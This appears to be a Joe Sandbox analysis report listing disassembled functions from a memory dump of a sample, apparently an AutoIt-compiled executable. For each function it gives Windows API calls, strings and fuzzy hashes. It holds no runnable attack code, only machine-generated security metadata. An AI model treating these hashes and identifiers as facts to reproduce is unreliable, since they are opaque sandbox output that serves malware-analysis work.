CreateMenu.USER32 ref: 00687185
SetMenu.USER32(?,00000000), ref: 00687194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00687221
IsMenu.USER32(?), ref: 00687237
CreatePopupMenu.USER32 ref: 00687241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0068726E
DrawMenuBar.USER32 ref: 00687276

Strings

F, xrefs: 00687262
0, xrefs: 00687160

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 3c17664cc7d94465b585303cfe296d1f04a2ce62b1dd070ab6a2ef803743fe30
Instruction ID: 4a9dbe948e0f82f89e69294e31e211b2eafabeb20b00a8b297f2e022cf4564c5
Opcode Fuzzy Hash: 3c17664cc7d94465b585303cfe296d1f04a2ce62b1dd070ab6a2ef803743fe30
Instruction Fuzzy Hash: 42415B74A01205EFDB10EF64D898EDA7BB6FF49310F244228F955A7361D731A910CF90

Function 006874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0068755E
CreateCompatibleDC.GDI32(00000000), ref: 00687565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00687578
SelectObject.GDI32(00000000,00000000), ref: 00687580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0068758B
DeleteDC.GDI32(00000000), ref: 00687594
GetWindowLongW.USER32(?,000000EC), ref: 0068759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006875B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006875BE

Strings

static, xrefs: 006874F6

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: c76d704899191fc0d7a0e49a3f40240f4549045064af98076c5798f09fa9fa75
Instruction ID: 2550664bced877db7cf1f377c910e484e48b1d27f1edf09b5738951062dfbc73
Opcode Fuzzy Hash: c76d704899191fc0d7a0e49a3f40240f4549045064af98076c5798f09fa9fa75
Instruction Fuzzy Hash: D3317E32104214BBDF11AF64DC08FDB3B6AFF09321F211324FA15961A0DB71D861DBA5

Function 00626E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00626E3E

Part of subcall function 00628B28: __getptd_noexit.LIBCMT ref: 00628B28

__gmtime64_s.LIBCMT ref: 00626ED7
__gmtime64_s.LIBCMT ref: 00626F0D
__gmtime64_s.LIBCMT ref: 00626F2A
__allrem.LIBCMT ref: 00626F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00626F9C
__allrem.LIBCMT ref: 00626FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00626FD1
__allrem.LIBCMT ref: 00626FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00627006
__invoke_watson.LIBCMT ref: 00627077

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 752c9cf661e035f38df7894944d0479f63c2bb5407bf330bcba9f598ea0e3686
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 0671E6B6A00F27ABD7149E78EC41B9AB3A6AF04324F14412DF514D7781E770E9048FD4

Function 00662527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00662542
GetMenuItemInfoW.USER32(006C5890,000000FF,00000000,00000030), ref: 006625A3
SetMenuItemInfoW.USER32(006C5890,00000004,00000000,00000030), ref: 006625D9
Sleep.KERNEL32(000001F4), ref: 006625EB
GetMenuItemCount.USER32(?), ref: 0066262F
GetMenuItemID.USER32(?,00000000), ref: 0066264B
GetMenuItemID.USER32(?,-00000001), ref: 00662675
GetMenuItemID.USER32(?,?), ref: 006626BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00662700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662735

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: feb4eb92f74b7ca96264dbcb99ca5b487aec1966cdb70571c087f2a96183a388
Instruction ID: 1194c25fafe74403257f9c6127d0e44a216943bc8a54bc00d650bc2324b4226f
Opcode Fuzzy Hash: feb4eb92f74b7ca96264dbcb99ca5b487aec1966cdb70571c087f2a96183a388
Instruction Fuzzy Hash: 4761AFB0900A4AAFDB21CFA4DCA8DFE7BBAFB41344F140169E842E7251D731AD05DB61

Function 00686F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00686FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00686FA8
GetWindowLongW.USER32(?,000000F0), ref: 00686FCC
_memset.LIBCMT ref: 00686FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00686FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00687067

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 0e76c6563aa9ca16f569143023e12e9b1d7e5da7d8fabbba29575ca0fddd078a
Instruction ID: d91f62cca699efd0673bd04de08097973473d77f2eaf2cb87a010b3c516ae7a0
Opcode Fuzzy Hash: 0e76c6563aa9ca16f569143023e12e9b1d7e5da7d8fabbba29575ca0fddd078a
Instruction Fuzzy Hash: 4E616D75900208AFDB11DFA4CC85EEE77FAEB09710F244259FA15AB3A1C771AD41DB50

Function 00656B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00656BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00656C18
VariantInit.OLEAUT32(?), ref: 00656C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00656C4A
VariantCopy.OLEAUT32(?,?), ref: 00656C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00656CB1
VariantClear.OLEAUT32(?), ref: 00656CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00656CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00656CDC
VariantClear.OLEAUT32(?), ref: 00656CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00656CF9

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: d620490b5053376a2438565b0b36f57b250160b9a5deb4c59552b3cae6e73ec7
Instruction ID: 0d532475edda1025f69cece8b9277ab9cc40a3ec7e1a45ca8fdb7f602bae0c6f
Opcode Fuzzy Hash: d620490b5053376a2438565b0b36f57b250160b9a5deb4c59552b3cae6e73ec7
Instruction Fuzzy Hash: 77415275A00119AFCF04DF64D8449EEBBBAEF08355F408169F955E7362CB31A949CFA0

Function 00675732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00675793
inet_addr.WSOCK32(?,?,?), ref: 006757D8
gethostbyname.WSOCK32(?), ref: 006757E4
IcmpCreateFile.IPHLPAPI ref: 006757F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00675862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00675878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 006758ED
WSACleanup.WSOCK32 ref: 006758F3

Strings

Ping, xrefs: 00675816

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 152303f9ee7c56cb8ce9c63adaa1118d7a82db4c7f00e6d6655237fb254edeee
Instruction ID: 7940fffe52967ef6175e103aec9d7f07501846d952e412a7b4460f0a8b26cb1a
Opcode Fuzzy Hash: 152303f9ee7c56cb8ce9c63adaa1118d7a82db4c7f00e6d6655237fb254edeee
Instruction Fuzzy Hash: 73518E71600610EFD710AF24DC45B6A7BE6EF48720F048A69F99ADB3E1DB70E800CB56

Function 0066B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0066B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0066B546
GetLastError.KERNEL32 ref: 0066B550
SetErrorMode.KERNEL32(00000000,READY), ref: 0066B5BD

Strings

READY, xrefs: 0066B596
NOTREADY, xrefs: 0066B57C
INVALID, xrefs: 0066B58F
UNKNOWN, xrefs: 0066B575
READONLY, xrefs: 0066B588

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 6148856900f317de55066d2cf21f9968a4f89d8d11a9af47660493e310caf2ad
Instruction ID: a25255a576d2434ca8586b61455e755d99e3c00c298af9d2669669920168879f
Opcode Fuzzy Hash: 6148856900f317de55066d2cf21f9968a4f89d8d11a9af47660493e310caf2ad
Instruction Fuzzy Hash: D5319075A40209EFCB04EF68C885EEE7BB6FF09310F105129F506D7292DB719A82CB91

Function 00658F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00659014
GetDlgCtrlID.USER32 ref: 0065901F
GetParent.USER32 ref: 0065903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0065903E
GetDlgCtrlID.USER32(?), ref: 00659047
GetParent.USER32(?), ref: 00659063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00659066

Strings

ComboBox, xrefs: 00658F9C
ListBox, xrefs: 00658FD1

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 6c1612e2874f9e30288ddc29db6e6bdee17b6eba2db7eb5aeeb6911fab01dd10
Instruction ID: bd3a14b30a4889ff8407ca3cb3cab65b7973ecd34edab7fd3eb2517b8eccf0d9
Opcode Fuzzy Hash: 6c1612e2874f9e30288ddc29db6e6bdee17b6eba2db7eb5aeeb6911fab01dd10
Instruction Fuzzy Hash: 2621C574A40108BFDF05ABA0CC85EFEBB76EF49310F10022AF961972E1EB755859DB24

Function 0065907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006590FD
GetDlgCtrlID.USER32 ref: 00659108
GetParent.USER32 ref: 00659124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00659127
GetDlgCtrlID.USER32(?), ref: 00659130
GetParent.USER32(?), ref: 0065914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 0065914F

Strings

ComboBox, xrefs: 00659087
ListBox, xrefs: 006590BC

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: d03643e07f702b868df3590931ed06dca3ec3ebef7e3113da0f8c9acf875934a
Instruction ID: 944a0f810e01614542cf03b61fb8fae9e2452d829207b98ce66f05ec59e24bfc
Opcode Fuzzy Hash: d03643e07f702b868df3590931ed06dca3ec3ebef7e3113da0f8c9acf875934a
Instruction Fuzzy Hash: 8921C574A40108BFDF15ABA4CC85EFEBB7AEF45301F10422AB911972E1EB755859DF20

Function 00659163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0065916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00659184
_wcscmp.LIBCMT ref: 00659196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00659211

Strings

SHELLDLL_DefView, xrefs: 00659190
smallicons, xrefs: 006591D9
list, xrefs: 006591F3
details, xrefs: 006591BF
largeicons, xrefs: 006591A5

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: b0b57de74b23358866bbef1d4793b0773264aacb457029a4c866c67d75b1284a
Instruction ID: 40a76f85250ec28204a4252e99a7f2a117c28926850f0053b62d220336cede32
Opcode Fuzzy Hash: b0b57de74b23358866bbef1d4793b0773264aacb457029a4c866c67d75b1284a
Instruction Fuzzy Hash: 08115976288717FAFB203624FC1ADE7379FDB11321F20012AFD00E01D1FE6269956AA4

Function 00667990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00667A6C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: b8bf6d438c8b7ae3a81b1950e317a35222dae0f6decc40f341e1b423d1849347
Instruction ID: e1ad9195055bb061b1291d10f8d333ad55496179c6819d8d44fedf4799d03bf6
Opcode Fuzzy Hash: b8bf6d438c8b7ae3a81b1950e317a35222dae0f6decc40f341e1b423d1849347
Instruction Fuzzy Hash: C0B19D7190421A9FDB00DFA4C885BBEB7F6FF09329F244469E941EB391D734A941CBA4

Function 006611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006611F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00660268,?,00000001), ref: 00661204
GetWindowThreadProcessId.USER32(00000000), ref: 0066120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660268,?,00000001), ref: 0066121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0066122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660268,?,00000001), ref: 00661245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660268,?,00000001), ref: 00661257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00660268,?,00000001), ref: 0066129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00660268,?,00000001), ref: 006612B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00660268,?,00000001), ref: 006612BC

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: d8c0af78a91aee8259d85256483574c986f64d3ad60013fe478ea05a30a62c5d
Instruction ID: 035d732cd4b3e86884c80d0a4ff6ac9a1f47436e7379955ac131c5ce21b70ed6
Opcode Fuzzy Hash: d8c0af78a91aee8259d85256483574c986f64d3ad60013fe478ea05a30a62c5d
Instruction Fuzzy Hash: 2231A075600208BFDB109F55EC98FBA77AFEF56315F145229F910CA2A0D7749EC08B64

Function 0060FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0060FAA6
OleUninitialize.OLE32(?,00000000), ref: 0060FB45
UnregisterHotKey.USER32(?), ref: 0060FC9C
DestroyWindow.USER32(?), ref: 006445D6
FreeLibrary.KERNEL32(?), ref: 0064463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00644668

Strings

close all, xrefs: 0060FAA1

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 73021db091e0ee2b9da301ab668e0a919deedba1a000110d965cb6f25bb67d40
Instruction ID: 2664d9d79c44b8ee04cdce468244f867a9c389a944f7eea915d4032c33701566
Opcode Fuzzy Hash: 73021db091e0ee2b9da301ab668e0a919deedba1a000110d965cb6f25bb67d40
Instruction Fuzzy Hash: C0A18030701212CFDB68EF14C596BAAF366BF05700F5542ADE80AAB692DF30AC56CF54

Function 00679113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00679167
VariantInit.OLEAUT32(?), ref: 00679238
VariantInit.OLEAUT32(?), ref: 00679339
VariantClear.OLEAUT32(?), ref: 00679343
VariantClear.OLEAUT32(?), ref: 006793A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0067931C
,,i, xrefs: 006791E5
Null Object assignment in FOR..IN loop, xrefs: 006791C8, 006792F6, 006793AE

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,i$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-316782094
Opcode ID: 3dc62619fce9649e55bc635a2130498d154cc5c3e9ed55d9e3fbe3a69d82f2d5
Instruction ID: ec814e485e3e16f8128bd4686445a752915f1cd374f0fad588e7b088bf2c84b5
Opcode Fuzzy Hash: 3dc62619fce9649e55bc635a2130498d154cc5c3e9ed55d9e3fbe3a69d82f2d5
Instruction Fuzzy Hash: 9C917B71A00219ABDF24DFA5C848FEEBBBAEF45720F108559F519AB281D7709941CBA0

Function 0065A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0065A439), ref: 0065A377

Strings

INSTANCE, xrefs: 0065A285
REGEXPCLASS, xrefs: 0065A13C
CLASSNN, xrefs: 0065A119
TEXT, xrefs: 0065A2AE
CLASS, xrefs: 0065A0F6
NAME, xrefs: 0065A1A9

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

